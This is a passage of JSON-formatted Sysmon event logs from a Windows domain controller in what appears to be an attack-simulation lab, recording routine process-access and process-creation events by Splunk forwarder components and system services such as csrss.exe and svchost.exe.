{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.085\r\nSourceProcessGUID: {A837DB8D-03E6-5F25-0000-0010A90E0B00}\r\nSourceProcessId: 2460\r\nSourceThreadId: 4432\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.085","SourceProcessGUID":"{A837DB8D-03E6-5F25-0000-0010A90E0B00}","SourceProcessId":"2460","SourceThreadId":"4432","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.523\r\nProcessGuid: {A837DB8D-03E7-5F25-0000-00108B100B00}\r\nProcessId: 3088\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.523","ProcessGuid":"{A837DB8D-03E7-5F25-0000-00108B100B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03E7-5F25-0000-00108B100B00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03E7-5F25-0000-00108B100B00}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03E7-5F25-0000-00108B100B00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03E7-5F25-0000-00108B100B00}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6002,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6003,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6004,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6005,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:51.522","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:51.522\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 